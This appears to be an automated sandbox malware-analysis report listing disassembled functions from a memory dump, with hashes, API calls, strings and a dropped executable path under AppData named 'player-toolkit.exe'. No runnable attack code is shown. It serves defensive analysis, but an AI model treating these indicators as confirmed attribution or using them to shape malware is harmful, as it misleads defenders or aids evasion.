Opcode Fuzzy Hash: 0ed6c9942d1dc66a4615a29b2f2616dedfbeb3811582b2e9e125c91c7d997c9c
Instruction Fuzzy Hash: FA913DB1D00258DFDB21DF64D985BDEBBF9BF04304F144199E818AB382DB759A888F91

Uniqueness

Uniqueness Score: -1.00%

Function 00042480, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 000424F6
allocator.LIBCONCRTD ref: 000425F6

Strings

,qh, xrefs: 00042490
,qh, xrefs: 000424D2, 0004258F, 000425D3

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
String ID: ,qh$,qh
API String ID: 3447690668-1407112415
Opcode ID: 480241c0232a371ccc6638ad30a2f28c86e3286b3b93049e1c1fb98ef13cbd87
Instruction ID: 5e3692a74439d0b4c28dd7d93940ea6e39b7669873442fa4d3fba2b73ffab3db
Opcode Fuzzy Hash: 480241c0232a371ccc6638ad30a2f28c86e3286b3b93049e1c1fb98ef13cbd87
Instruction Fuzzy Hash: 0471D3B0E042489BEB24DFA8C849BEEBBB5EF45314F504568F410AB292D7709985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00022F60, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161sleepCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00023082
Sleep.KERNEL32(0000000A,00000000,?,000F4240,00000000,?,?,?,?,6871E12C,0002161B,00000000), ref: 000230F3

Strings

,qh, xrefs: 00022F85, 00023056
Session already connected, xrefs: 00023145

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: SleepUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: ,qh$Session already connected
API String ID: 4141101911-2763605846
Opcode ID: 19725a94e8bac0f74512c79b3f1a1426bbf15eade2d74bad44c1cdb0b2313870
Instruction ID: 97251dfba8ad2ab5dd1207fc58d0a0135a6301f61e2bb33076f046a67b031dea
Opcode Fuzzy Hash: 19725a94e8bac0f74512c79b3f1a1426bbf15eade2d74bad44c1cdb0b2313870
Instruction Fuzzy Hash: BD51C330A003189FDB25DF64DC95BEEB7B8EF04700F4045A8F555AB292DB75AA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000F7405, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe, xrefs: 000F7443, 000F744A, 000F747E

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
API String ID: 0-86326114
Opcode ID: 81163bd7d3a5d1f9dbeb38ab181358d245fb0ba041aab69e684e17bed192eb3b
Instruction ID: bff203a00c08631b7eb4132f153a3e17bb458bfbfb51ea2b0af68cb5eae284ae
Opcode Fuzzy Hash: 81163bd7d3a5d1f9dbeb38ab181358d245fb0ba041aab69e684e17bed192eb3b
Instruction Fuzzy Hash: 0A31A570A04619AFDB62DF99DC80DBEBBFCEF85710B100066F608D7A11D7B09A40EB51

Uniqueness

Uniqueness Score: -1.00%

Function 000E9D70, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000E9D95
CatchIt.LIBVCRUNTIME ref: 000E9E7B

Strings

MOC, xrefs: 000E9DA7
RCC, xrefs: 000E9DAF

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: b90b1ac406ad087ff6cd0e34bd520bf3774772fb3627057c288e3fc9553e1130
Instruction ID: dbc97e7ca478b44f2d09297f7fb188c1c04649c3b96ef2037604d82df9d901eb
Opcode Fuzzy Hash: b90b1ac406ad087ff6cd0e34bd520bf3774772fb3627057c288e3fc9553e1130
Instruction Fuzzy Hash: 3B414871900249EFCF16DF99CD81AEEBBB5BF48304F188199FA04B6222D3359951DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00038C80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00038CB5
__floor_pentium4.LIBCMT ref: 00038D75
__floor_pentium4.LIBCMT ref: 00038DA7

Strings

,qh, xrefs: 00038C90

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: ,qh
API String ID: 4168288129-2532484786
Opcode ID: 00c20ed992ce04b60fb9cabc89b038b5698f9987f1dd1442fb661b5db8333139
Instruction ID: b579e87f961f0a33f780180e886767a8ef6be30d6617a6dcd0f7926250163ed9
Opcode Fuzzy Hash: 00c20ed992ce04b60fb9cabc89b038b5698f9987f1dd1442fb661b5db8333139
Instruction Fuzzy Hash: CD316731C24E19DECB03EF74E8604AEFBB8EF8A295B008756E95676411FB3191D2C740

Uniqueness

Uniqueness Score: -1.00%

Function 000E8365, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 000E83A8
std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 000E83DC

Strings

Bad read pointer - no RTTI data!, xrefs: 000E839F
Attempted a typeid of nullptr pointer!, xrefs: 000E83D3

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: std::__non_rtti_object::__construct_from_string_literal
String ID: Attempted a typeid of nullptr pointer!$Bad read pointer - no RTTI data!
API String ID: 3887850325-4195314292
Opcode ID: 9dd2535b0c8f2e55dc65249c09a1c0b8f0fd1a04b879c0cb282f0c2aad3fb884
Instruction ID: 6292e5deb36fe041d15594529c1a2aa9daa4c01a5fc1d3e5298dbb94f85382ac
Opcode Fuzzy Hash: 9dd2535b0c8f2e55dc65249c09a1c0b8f0fd1a04b879c0cb282f0c2aad3fb884
Instruction Fuzzy Hash: 63F04F726443489FDB14DBA6E98AEDD73F5EB08B21F208456E104B71D1EBB5EE048B60

Uniqueness

Uniqueness Score: -1.00%

Function 00128860, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 8COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00128865

Strings

D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\src\StatementImpl.cpp, xrefs: 00128982
pExtraction, xrefs: 00128987
deque<T> too long, xrefs: 00128860

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_
String ID: D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\src\StatementImpl.cpp$deque<T> too long$pExtraction
API String ID: 909987262-1149338921
Opcode ID: 3a5d9c3a684203be84e3dea37c2b59c3ad5b58c226e4aed957418dc163f468a8
Instruction ID: f3f850a5f14497d3b56c3499cd274ea1c2089aafa2022389f973b8d55f947e33
Opcode Fuzzy Hash: 3a5d9c3a684203be84e3dea37c2b59c3ad5b58c226e4aed957418dc163f468a8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 000FD2E7, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000FD371

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 19773fd457ab8ccdad5b1d48bcaa76ba7cff6a31c8e0f8f5a1a4d3434e15241c
Instruction ID: 41775c211a7ec2b762d310d3448e6ee2f1bafab6245a8d5d52c075041f581fbd
Opcode Fuzzy Hash: 19773fd457ab8ccdad5b1d48bcaa76ba7cff6a31c8e0f8f5a1a4d3434e15241c
Instruction Fuzzy Hash: 4EB167729006899FDB11CF28C8817FEBBE7EF55304F24416BEA45AB642D634EE01DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EE567, Relevance: 6.2, APIs: 4, Instructions: 178COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 000EE5D2
operator+.LIBVCRUNTIME ref: 000EE622
shared_ptr.LIBCMT ref: 000EE6EE
operator+.LIBVCRUNTIME ref: 000EE774

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: 2c1ee723ed2dc12e2515962b0b65f837913dc1cdde25bde9ec3fdbf3f258b166
Instruction ID: fb55c262b30dc0fccb698d8023b7bb745b71d642961c80dfb27511ded4f9dd3a
Opcode Fuzzy Hash: 2c1ee723ed2dc12e2515962b0b65f837913dc1cdde25bde9ec3fdbf3f258b166
Instruction Fuzzy Hash: 0A61A2B19041CDEFCB25CF66D8449AE7BF5FB49344F04856AE44ABB622E3329645CF40

Uniqueness

Uniqueness Score: -1.00%

Function 000E976F, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 000E9836
___AdjustPointer.LIBCMT ref: 000E9859
___AdjustPointer.LIBCMT ref: 000E98F5

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 44fcd9588975dece1436ecc1b7f25e0b84349c743239823c5768c4e75f32e981
Instruction ID: 5252a28ba693a62a366c467d01c47872a0bea008da06176452ed4b3676222cb2
Opcode Fuzzy Hash: 44fcd9588975dece1436ecc1b7f25e0b84349c743239823c5768c4e75f32e981
Instruction Fuzzy Hash: C9510671A05286AFDB298F16DA41BBA77E4FF45710F14042EEC45776A2EB31EC80D790

Uniqueness

Uniqueness Score: -1.00%

Function 000ED411, Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 000ED499

Part of subcall function 000EA879: __aulldvrm.LIBCMT ref: 000EA8AA

DName::operator+.LIBCMT ref: 000ED4A6
DName::operator=.LIBVCRUNTIME ref: 000ED526
DName::DName.LIBVCRUNTIME ref: 000ED546

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 64973c4d42bf075a981ac7a5f50be0cf91c4bb5099013c533abfa1c88107dab7
Instruction ID: 243aca029ee159d8462b3e3832b02b1aa73ff7ebf6d1089bc09edca76251d3a4
Opcode Fuzzy Hash: 64973c4d42bf075a981ac7a5f50be0cf91c4bb5099013c533abfa1c88107dab7
Instruction Fuzzy Hash: 675190B1A00694DFCB15DF59D880AEDBBF4FF4A304F148197E4126B792D770AA80DB91

Uniqueness

Uniqueness Score: -1.00%

Function 000FBA6F, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
_free.LIBCMT ref: 000FBAD1
_free.LIBCMT ref: 000FBB07
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: aaab5911bc46ac6f73d227cbb217677d3ac12559d44ee0c082878b0dcd15ef4a
Instruction ID: 79c123b433904265996636171262bc627d63d538288ada1b0b2de6a153bee34f
Opcode Fuzzy Hash: aaab5911bc46ac6f73d227cbb217677d3ac12559d44ee0c082878b0dcd15ef4a
Instruction Fuzzy Hash: 7211E33230020E6BD75126B5EC86E7B359AABC2771B240224F724C6CD3EFE28D007911

Uniqueness

Uniqueness Score: -1.00%

Function 000FBBC6, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000FA9C6,000FCE4D,?,00101C73,?,00000004,00000000,?,?,?,000F7D0B,?,00000000), ref: 000FBBCB
_free.LIBCMT ref: 000FBC28
_free.LIBCMT ref: 000FBC5E
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00101C73,?,00000004,00000000,?,?,?,000F7D0B,?,00000000,00000004), ref: 000FBC69

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d59ca52d476ddd06410f2ff9e015ac8fefcf3d3d48605f7d330e3af77ab76969
Instruction ID: f0ceb911fe1c05e0a5ce8030578d30bf1a6bbf99e51167f9de4d42aa68bb3462
Opcode Fuzzy Hash: d59ca52d476ddd06410f2ff9e015ac8fefcf3d3d48605f7d330e3af77ab76969
Instruction Fuzzy Hash: 7211E53220420D6AE75127B9DD87E7B329AEBC2B717240224F724C2DE3DFE28D007A50

Uniqueness

Uniqueness Score: -1.00%

Function 001082DC, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,000FECF5,?,00000001,?,?,?,000F41C6,?,00000002,?), ref: 001082F3
GetLastError.KERNEL32(?,000FECF5,?,00000001,?,?,?,000F41C6,?,00000002,?,?,?,?,000F4712,000F460B), ref: 001082FF

Part of subcall function 001082C5: CloseHandle.KERNEL32(FFFFFFFE,0010830F,?,000FECF5,?,00000001,?,?,?,000F41C6,?,00000002,?,?,?), ref: 001082D5

___initconout.LIBCMT ref: 0010830F

Part of subcall function 00108287: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001082B6,000FECE2,?,?,000F41C6,?,00000002,?,?), ref: 0010829A

WriteConsoleW.KERNEL32(?,?,?,00000000,?,000FECF5,?,00000001,?,?,?,000F41C6,?,00000002,?,?), ref: 00108324

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 85cee03ce88aa81324fea3a1354786b157333a07983dacfb2847eaa7b656badc
Instruction ID: ab39227f6cada5a6429a4d19a493cf4d2eb8dfd485c7a16bba85253e1ce126be
Opcode Fuzzy Hash: 85cee03ce88aa81324fea3a1354786b157333a07983dacfb2847eaa7b656badc
Instruction Fuzzy Hash: 1FF03036400358FBCF222FD5EC08A9D3F26FB897A1F444010FA9889570DB72C860DB91

Uniqueness

Uniqueness Score: -1.00%

Function 000E532D, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,000E52CA,00000064), ref: 000E5350
LeaveCriticalSection.KERNEL32(001AD4A8,?,?,000E52CA,00000064,?,?,?,00013F74,001ACFF0,6871E12C,?,?,00148131,000000FF), ref: 000E535A
WaitForSingleObjectEx.KERNEL32(?,00000000,?,000E52CA,00000064,?,?,?,00013F74,001ACFF0,6871E12C,?,?,00148131,000000FF), ref: 000E536B
EnterCriticalSection.KERNEL32(001AD4A8,?,000E52CA,00000064,?,?,?,00013F74,001ACFF0,6871E12C,?,?,00148131,000000FF,?,00012935), ref: 000E5372

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: eb933bafa35954ade1e338e50cb4bdf73facfe59199293e8238214edf54cb167
Instruction ID: c87d679cc2f0b5da0b2b1534d63d4d3d6ce84f484b0bb5309eac003987306068
Opcode Fuzzy Hash: eb933bafa35954ade1e338e50cb4bdf73facfe59199293e8238214edf54cb167
Instruction Fuzzy Hash: EEE0ED36541B24EFCA122B91FC09A9E7F19EF0EBA7F044011F50A6AD70C77169409BE2

Uniqueness

Uniqueness Score: -1.00%

Function 000D6A40, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 374COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D6C0C

Strings

recovered %d frames from WAL file %s, xrefs: 000D6E5A
, xrefs: 000D6AC9

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: $recovered %d frames from WAL file %s
API String ID: 885266447-3175670447
Opcode ID: cd2e466e3906ca968d90279b2915b8b9487e5c576fd1ee7483e2c6871de00fe0
Instruction ID: c5a8bdd64af06b30b1fb0d396cf32c1a488d22e4819bd83939e05138422bcb90
Opcode Fuzzy Hash: cd2e466e3906ca968d90279b2915b8b9487e5c576fd1ee7483e2c6871de00fe0
Instruction Fuzzy Hash: 3FD18771A047019FD760DF68C880B6BB7E5EF88704F10492EF59AC7352EB72E9458B62

Uniqueness

Uniqueness Score: -1.00%

Function 0007ABC0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0007ACC1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0007AD16

Strings

recovered %d pages from %s, xrefs: 0007AEE4

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: recovered %d pages from %s
API String ID: 885266447-1623757624
Opcode ID: 23b1e18969f151e0cce6c77e1198ce558c3468acd7ddf731e5dcf2fe0449a099
Instruction ID: 6ce1a033b90c0dca8858aed4c2f70e2c568c8e3361cce4519a64c3a495692bb4
Opcode Fuzzy Hash: 23b1e18969f151e0cce6c77e1198ce558c3468acd7ddf731e5dcf2fe0449a099
Instruction Fuzzy Hash: BAB1DE71E04216AFC760CF24C880AAFB7E4FF89354F048528FD9997602E338ED558B96

Uniqueness

Uniqueness Score: -1.00%

Function 00031E30, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 0002C760: __aulldiv.LIBCMT ref: 0002C7C2
Part of subcall function 0002C760: __aulldiv.LIBCMT ref: 0002C845

allocator.LIBCONCRTD ref: 00031F0F

Part of subcall function 00011EF0: std::_Xinvalid_argument.LIBCPMT ref: 00011EF8

Strings

,qh, xrefs: 00031FC5, 00031FD8, 00031FC8
A, xrefs: 00031EA6

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
